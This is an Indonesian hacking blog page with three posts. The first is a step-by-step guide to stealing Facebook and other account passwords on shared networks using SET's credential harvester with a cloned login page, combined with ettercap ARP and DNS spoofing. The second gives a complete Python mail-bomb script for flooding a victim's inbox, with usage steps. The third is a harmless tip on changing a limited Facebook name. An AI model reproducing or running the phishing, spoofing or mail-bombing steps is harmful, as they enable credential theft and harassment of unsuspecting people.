Sunday, April 15, 2012

Hack Account Facebook , Twitter , Gmail dll With Social-Engineering Toolkit + Video ~ Backtrack



Hack Account Facebook , Twitter , Gmail dll With Social-Engineering Toolkit + Video ~ Backtrack



















Bagaimana Fucklentine kemarin??? Semoga aja agan tidak latah ikut²an orang kampungan merayakannya...
nih hadiah dari saya buat yang merayakan http://dearbrands.com/ hehehe...

kali ini saya akan share tentang SET atau Social-Engineering Toolkit beserta Videonya ( dibawah )..
SET ini sudah tersedia di Backtrack 5 ...
ini sejenis fake login yang alamatnya adalah ip address kita...
jadi kebelet pngen ke warnet / hotspot hahaha..
oke mulai ....


Pertama buka terminal..

1. cd /pentest/exploits/set (enter)
2. ./set (enter)
3. pilih Social-Engineering Attacks dengan cara tekan angka 1
4. pilih Website Attack Vectors tekan 2
5. pilih Credential Harvester Attack Method tekan 3
6. pilih Web Templates tekan 1
jika memilih Site Cloner kita perlu memasukan alamat web yang akan kita buat menjadi fake login, dan jika web templates kita tinggal memilih yang sudah disediakan oleh SET itu sendiri, facebook contohnya...
7. tinggal pilih template yg mana, untuk contoh kita coba facebook, pilih 4
8. Press {return} to continue. tekan enter..


[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:


berarti SET sudah selesai....etss jangan di close.. :p nanti passwordnya muncul di bawah itu..

Bagaimana SET akan bekerja ? jika korban memubuka alamat http://ipadresskita atau http://192.168.0.3 misalnya maka tampilannya akan seperti facebook, dan ketika korban login , akan terkirim ussername and password ke terminal kita...( untuk melihat ip address , lakukan perintah ifconfig pada terminal)

Tapi sangat tipis kemungkinan korban mengakses http://192.168.0.3 , lalu bagaimana agar korban dapat membuka http://192.168.0.3 / ip address kita ?? lakukan saja DNS SPOOFING...

oke kita buat agar setiap korban mengakses http://www.facebook.com akan beralih ke http://192.168.0.3.
korban tidak akan curiga karena url tetap www.facebook.com dan tampilannya pun sama persis...

1. buka etter dns dengan perintah gedit /usr/local/share/ettercap/etter.dns
2. edit menjadi :

facebook.com A 192.168.0.3
*.facebook.com A 192.168.0.3

192.168.0.3 itu contoh ip saya...
setelah itu save..
3. jalankan dns spoofing dengan perintah

ettercap -Tqi (interfaces) -P dns_spoof -M ARP // //
interfaces saya eth0 ( lihat di ifconfig ) jadi perintahnya seperti ini :
ettercap -Tqi eth0 -P dns_spoof -M ARP // // 

setelah itu , kita buka terminal yang pertama (SET)
kita tunggu sampai korban login..nanti akan ada email dan password , silahkan gunakan dengan bijak :p
jika kurang mengerti lihat Video saya :




fullscreen jika kurang jelas...
selamat mencoba :D

MailBomb With Backtrack













#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Use it at your own risk !!!

import os
import smtplib
import getpass
import sys


server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')


to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')

if server == 'gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
else:
    print 'Applies only to gmail and yahoo.'
    sys.exit()

print ''

try:
    server = smtplib.SMTP(smtp_server,port)
    server.ehlo()
    if smtp_server == "smtp.gmail.com":
            server.starttls()
    server.login(user,passwd)
    for i in range(1, total+1):
        subject = os.urandom(9)
        msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
        server.sendmail(user,to,msg)
        print "\rTotal emails sent: %i" % i
        sys.stdout.flush()
    server.quit()
    print '\n Done !!!'
except KeyboardInterrupt:
    print '[-] Canceled'
    sys.exit()
except smtplib.SMTPAuthenticationError:
    print '\n[!] The username or password you entered is incorrect.'
    sys.exit()




Cara Save :

1. Buka Terminal ketik cd Desktop ( untuk menyimpan di Desktop )
2. Copy script di atas
3. ketik nano ebomb.py lalu paste , keluar dengan Ctrl + x - y - enter

Cara menggunakan :

1 . cd Desktop
2. chmod 755 *
3. ./ebomb.py
4. - server mail ( contoh gmaildi isi dengan gmail )
    - username ( alamat email anda )
    - Password ( password email anda )
    - to ( email korban )
    - message ( pesan anda )
    - Number of send ( jumlah pesan yang akan di kirim )

Contoh output jika berhasil :


Total emails sent: 1
Total emails sent: 2
Total emails sent: 3
Total emails sent: 4
Total emails sent: 5
Total emails sent: 6
Total emails sent: 7
Total emails sent: 8
Total emails sent: 9
Total emails sent: 10
Total emails sent: 11
Total emails sent: 12
Total emails sent: 13
Total emails sent: 14
Total emails sent: 15
Total emails sent: 16
Total emails sent: 17
Total emails sent: 18
Total emails sent: 19
Total emails sent: 20

 Done !!!



Selamat mencoba!

Cara Mengganti Nama Facebook Yang Sudah Limit

Halo gan, apa Akun fb agan senasib dengan saya ??
tidak bisa mengganti nama karena sudah limit??
ya memang facebook sudah banyak perubahan tampilan dll.Contohnya ganti nama pun dibatasi..
Tapi tenang saya punya cara ..

1.Ganti nama yang tersedia dulu di pengaturan akun, nama apa aja yang ada di pilihannya..yang penting berubah dulu..
2.Silahkan klik ini http://www.facebook.com/hacked
3.Klik amankan Akun






4.Lakukan sampai langkah tiga
5.Nanti akan ada seperti gambar di bawah..jangan klik simpan dan lanjutkan dulu..
klik ganti, lihat gambar di bawah ini 






6.Silahkan ganti nama agan , lalu simpan dan lanjutkan sampai selesai..
ga perlu di kasih gambar jg gpp ya...
mudah ko..


Selamat mencoba......